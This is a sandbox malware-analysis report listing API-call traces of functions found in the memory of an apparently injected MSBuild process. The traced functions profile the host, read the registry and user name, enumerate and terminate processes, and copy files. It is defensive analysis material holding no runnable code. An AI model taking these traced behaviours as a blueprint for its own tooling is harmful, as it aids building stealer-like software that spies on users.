Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: 7b7d1b79e19f05ca12c8064292c75d5cc37a930701fe9e474d57c854d10d4e52
Instruction ID: a1553181ab18edaa3b94d53bb79d7bf4b62666c9831d6ad32faf63d23f73e213
Opcode Fuzzy Hash: 7b7d1b79e19f05ca12c8064292c75d5cc37a930701fe9e474d57c854d10d4e52
Instruction Fuzzy Hash: 98F062B5A41318BBD710ABE0AC0AFAB7B7DEB44755F002169FB05A6181D7B45A4087E1

Function 0040FED0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,00423408,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00423408), ref: 0040FEDE
HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,00423408,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00423408,00000000), ref: 0040FEE5
GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 0040FF05
wsprintfA.USER32 ref: 0040FF2B

Strings

@, xrefs: 0040FEFE
%d MB, xrefs: 0040FF25

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 3644086013-3474575989
Opcode ID: c91f0ec11f474d8c1381f109a4bcd534d4041cf4b5121d99c497be17c465c294
Instruction ID: af9ca1c618701aaf6e1e57e94b25e62574dec66522ec45beacafd1b49d2b4fa6
Opcode Fuzzy Hash: c91f0ec11f474d8c1381f109a4bcd534d4041cf4b5121d99c497be17c465c294
Instruction Fuzzy Hash: ACF062B1A40218ABE714ABA4DC0AFBE77ADFB01345F401129F706E61C0D7B89C0187E5

Function 004158B0 Relevance: 9.1, APIs: 6, Instructions: 130registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004158D5
RegOpenKeyExA.ADVAPI32(80000001,00E594B0,00000000,00020119,?), ref: 004158F4
RegQueryValueExA.ADVAPI32(?,00E5A440,00000000,00000000,00000000,000000FF), ref: 00415918
RegCloseKey.ADVAPI32(?), ref: 00415922
lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00415947
lstrcatA.KERNEL32(?,00E5A3E0), ref: 0041595B

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 9d24550046d12cef6d6a8430f06f5fcf17270119dd68565c0f59e3130cccedf6
Instruction ID: b2658f5a2186259637989032082ab400ffc55dd45aba0fd3878622be2ef6c76c
Opcode Fuzzy Hash: 9d24550046d12cef6d6a8430f06f5fcf17270119dd68565c0f59e3130cccedf6
Instruction Fuzzy Hash: BD41A3B5900208ABCF24EFA1CC46FDE3739AB85304F40865DFA5566191DB746AC8CFE5

Function 00406C20 Relevance: 9.1, APIs: 6, Instructions: 71filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,0040BA32,?,00000000,?,00000000,00000000), ref: 00406C3F
GetFileSizeEx.KERNEL32(00000000,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C55
LocalAlloc.KERNEL32(00000040,?,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C70
ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C89
LocalFree.KERNEL32(?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CA9
CloseHandle.KERNEL32(00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CB1

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: f92c717aaf7597c66bfacc60d54a838b8fdc52d17d646df18638fdf46865ad5a
Instruction ID: 5b08f293fa4d369547e293c080fd62cfee42250c67ac5e0144c02d8e3dd3972c
Opcode Fuzzy Hash: f92c717aaf7597c66bfacc60d54a838b8fdc52d17d646df18638fdf46865ad5a
Instruction Fuzzy Hash: B011AF71604209AFEB10DF64DC85EBB77BEEB80344F10513EFA42A7290DB389D518BA4

Function 004175F0 Relevance: 9.1, APIs: 6, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,00E4A9F0), ref: 00417748
Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,00E4A8E8), ref: 00417761
Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,00E4A8A0), ref: 00417779
Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,00E4AAE0), ref: 00417791
Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,00E4EF98), ref: 004177AA
Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,00E56190), ref: 004177C2
Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,00E563B0), ref: 004177DA
Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,00E4AA68), ref: 004177F3
Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,00E4AAB0), ref: 0041780B
Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,00E4A918), ref: 00417823
Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,00E4A930), ref: 0041783C
Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,00E561F0), ref: 00417854

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040FAE0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417612,004201E9), ref: 0040FAEC
Part of subcall function 0040FAE0: HeapAlloc.KERNEL32(00000000,?,?,?,00417612,004201E9), ref: 0040FAF3
Part of subcall function 0040FAE0: GetUserNameA.ADVAPI32(00000000,004201E9), ref: 0040FB07

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 00417672
CloseHandle.KERNEL32(00000000), ref: 00417681
OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 00417697
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004176B1
CloseHandle.KERNEL32(00000000), ref: 004176BF
ExitProcess.KERNEL32 ref: 004176C7

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AddressProc$Eventlstrcpy$CloseHandleHeapOpenProcess$AllocCreateExitNameUserlstrcatlstrlen
String ID:
API String ID: 1749527509-0
Opcode ID: 1bdeba99335991e6f9bdbcc5571e6edad701c08b7eb7378d217687897852acd7
Instruction ID: 13c05977e48a492468067969b5632ac7cddf019cfab1cdc1380e7e7caaa560eb
Opcode Fuzzy Hash: 1bdeba99335991e6f9bdbcc5571e6edad701c08b7eb7378d217687897852acd7
Instruction Fuzzy Hash: 11213B71A001087BDB14FBB1DC56FEE7378AF10704F50513AB606B24D2EF786A088AA9

Function 00409690 Relevance: 7.8, APIs: 5, Instructions: 264fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 00410B80: GetSystemTime.KERNEL32(004201E9,00E50050,004201E9,?,00000030,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 00410BA9

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040976A
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00409734

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 004110F0: memset.MSVCRT ref: 0041110A
Part of subcall function 004110F0: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,00000000,?,00409753,00409C77), ref: 0041113D
Part of subcall function 004110F0: HeapAlloc.KERNEL32(00000000,?,00409753,00409C77), ref: 00411144
Part of subcall function 004110F0: wsprintfW.USER32 ref: 00411153
Part of subcall function 004110F0: OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 004111BB
Part of subcall function 004110F0: TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 004111CA
Part of subcall function 004110F0: CloseHandle.KERNEL32(00000000,?,?), ref: 004111D1

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process$CopyFileHeaplstrcat$AllocCloseHandleOpenSystemTerminateTimelstrlenmemsetwsprintf
String ID:
API String ID: 3536976966-0
Opcode ID: 48038416943861244995db3fe22c3c07c1ac8d57abec220332203bf17e321ea3
Instruction ID: 59642c9a9299a7c4d39bed30f6b85666f3aa0001a0dfc23d3a4e96657f843de5
Opcode Fuzzy Hash: 48038416943861244995db3fe22c3c07c1ac8d57abec220332203bf17e321ea3
Instruction Fuzzy Hash: 8491EB72910108ABCB14FBA1DC56DEE7379AF54304F50813EF506B65E2EF386A0DCA69

Function 00419FE0 Relevance: 7.6, APIs: 5, Instructions: 134fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,00000030,?,0041B1A9,?,?,?,00000000), ref: 0041A035
CreateFileA.KERNEL32(?,40000000,00000000,00000000,0041B1A9,00000080,00000000,00000000,00000030,?,0041B1A9,?,?,?,00000000), ref: 0041A06F

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: 772bf794a0539b62a801477fbb62bcb276aa9b4d2b65757f9edafb53a070daec
Instruction ID: ed9b1ade8afe9e764bcb327c8eb7a8881111bfc1a91da69b80f20d04efd87e30
Opcode Fuzzy Hash: 772bf794a0539b62a801477fbb62bcb276aa9b4d2b65757f9edafb53a070daec
Instruction Fuzzy Hash: 10419472505704AFE7309F28A8C0BA7BBD8E754328F108A2FF159C6641D275DCD48B69

Function 6C57C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C57C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C57C969
GetSystemInfo.KERNEL32(?), ref: 6C57C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C57C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C57C9E2

Memory Dump Source

Source File: 00000001.00000002.2458707840.000000006C561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C560000, based on PE: true

Associated: 00000001.00000002.2458628586.000000006C560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2459852233.000000006C5DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2460006367.000000006C5EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2460057313.000000006C5F2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c560000_MSBuild.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 4b2ddb7b85e140370599d71ccc26e1fa0834c1e943105370711dbe12e60bcd4d
Instruction ID: f150fbe94d8c1e832a2ab845f3b7c344a1ed1b28baa67eae20739e333a8acc35
Opcode Fuzzy Hash: 4b2ddb7b85e140370599d71ccc26e1fa0834c1e943105370711dbe12e60bcd4d
Instruction Fuzzy Hash: 1621FC31741318ABDB94AE64DC84BAE777AAF8A704F510519F903A7740EB707C4087A9

Function 00410630 Relevance: 7.6, APIs: 5, Instructions: 82commemoryCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00424770,00000000,00000001,004238C4,00410847,00000000,00000000,00000030,00410847,00000030,?,00000001,?,00000030,00000000,00000000), ref: 0041066D
SysAllocString.OLEAUT32(?), ref: 0041067B
_wtoi64.MSVCRT ref: 004106BA
SysFreeString.OLEAUT32(?), ref: 004106D9
SysFreeString.OLEAUT32(00000000), ref: 004106E0

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateInstance_wtoi64
String ID:
API String ID: 1817501562-0
Opcode ID: 43ba9061f7aaa9e19d061b62b181f6edba0a93b387e1e1e93ae49384c182bd82
Instruction ID: e53d099b401adf85f62220e949137e4eb195d033f19141da227454a58e436e12
Opcode Fuzzy Hash: 43ba9061f7aaa9e19d061b62b181f6edba0a93b387e1e1e93ae49384c182bd82
Instruction Fuzzy Hash: C121ADB1A40259AFCB00DFA8CC81AEEBBB9EF89310F10856AF509D7350C7359941CBA4

Function 00410200 Relevance: 7.6, APIs: 5, Instructions: 61processCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410228
Process32First.KERNEL32(00000000,00000128), ref: 00410238
Process32Next.KERNEL32(00000000,00000128), ref: 0041024A

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Process32Next.KERNEL32(00000000,00000128), ref: 0041029E
CloseHandle.KERNEL32(00000000), ref: 004102A9

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Process32lstrcpy$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 562399079-0
Opcode ID: 6641976aa709788164a1774861f524becb7537c5be8e138fdb7114088aa02426
Instruction ID: b719f9b5f692b2ac1a9fa5fbc0615dd86b5ea1c9724ba4ed1b36593775d07faa
Opcode Fuzzy Hash: 6641976aa709788164a1774861f524becb7537c5be8e138fdb7114088aa02426
Instruction Fuzzy Hash: 111194326001186BDB15EB56DC06BFE737DAF84B00F00417EF605E2191DF785A4A8BE9

Function 0040FD30 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040FD45
HeapAlloc.KERNEL32(00000000), ref: 0040FD4C
RegOpenKeyExA.KERNEL32(80000002,00E50640,00000000,00020119,00000000), ref: 0040FD6B
RegQueryValueExA.KERNEL32(00000000,00E595F0,00000000,00000000,00000000,000000FF), ref: 0040FD86
RegCloseKey.ADVAPI32(00000000), ref: 0040FD90

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: d594ebf37586e0727eba3e8eb50fd5e32515ea22ef465c73045e54e17348c99c
Instruction ID: d8ad9fbc0ebf95024768528cc8c117c10f0d608e1468c19e6a8aac0af7a2ce34
